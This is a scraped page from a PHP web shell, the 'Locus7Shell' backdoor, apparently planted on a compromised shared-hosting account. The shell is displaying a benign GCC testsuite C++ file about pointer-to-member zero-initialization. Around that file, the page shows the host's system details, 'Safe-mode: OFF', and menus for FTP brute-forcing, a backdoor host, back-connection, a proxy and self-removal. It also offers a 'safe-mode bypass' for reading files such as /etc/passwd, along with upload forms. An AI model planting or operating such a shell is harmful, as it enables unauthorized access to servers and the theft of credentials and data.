Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/init/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pm1.C (1.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// { dg-do run }

// Copyright 2002  Free Software Foundation
// Contributed by Jason Merrill and Alexandre Oliva

// Test zero-initialization of pointers to data members.  Their NULL
// value is represented with -1, not 0.

#include <stdlib.h>

struct A
{
  int i;
};

int A::* gp;

typedef int A::* iApm;

iApm gp_zero = 0;
iApm gp_dflt = iApm();
iApm gp_cast = (iApm)0;
iApm gp_func = iApm(0);
iApm gp_stat = static_cast<iApm>(0);

struct AD : A {};

int AD::* gp_impl = gp_dflt;
int AD::* gp_down = static_cast<int AD::*>(gp_stat);

int A::* ga[2];

// Test use in a simple struct.
struct B
{
  int A::* mp;
};

B gb;

struct D;
struct C;
extern D gd;
extern C gc;

// Test that in a class with a constructor, the pointer to member is
// zero-initialized until the constructor is run.
struct C
{
  int A::* mp;
  inline C ();
};

int fail;
struct D
{
  int count;
  inline D ();
};

C::C() : mp (&A::i) { gd.count++; }

D::D() : count (0)
{
  if (gc.mp != 0)
    abort ();
}

// The D must come first for this to work.
D gd;
C gc;

int main()
{
  static int A::* slp;
  static int A::* sla[2];
  static B slb;

  if (gp != 0 || slp != 0
      || gp_zero != 0 || gp_dflt != 0 || gp_cast != 0
      || gp_func != 0 || gp_stat != 0
      || gp_impl != 0 || gp_down != 0)
    abort ();
  if (ga[1] != 0 || sla[1] != 0)
    abort ();
  if (gb.mp != 0 || slb.mp != 0)
    abort ();
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--